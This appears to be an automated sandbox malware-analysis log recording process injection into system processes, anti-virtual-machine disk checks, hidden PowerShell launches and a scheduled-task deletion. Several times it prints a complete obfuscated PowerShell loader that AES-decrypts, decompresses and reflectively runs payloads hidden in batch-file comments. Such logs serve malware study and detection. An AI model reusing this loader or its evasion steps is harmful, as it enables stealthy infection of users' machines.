Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23BCC520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 23BCC550000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1D865090000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 199015D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1CB2E610000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1CB2E640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 188D6710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 29F37400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 
'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, 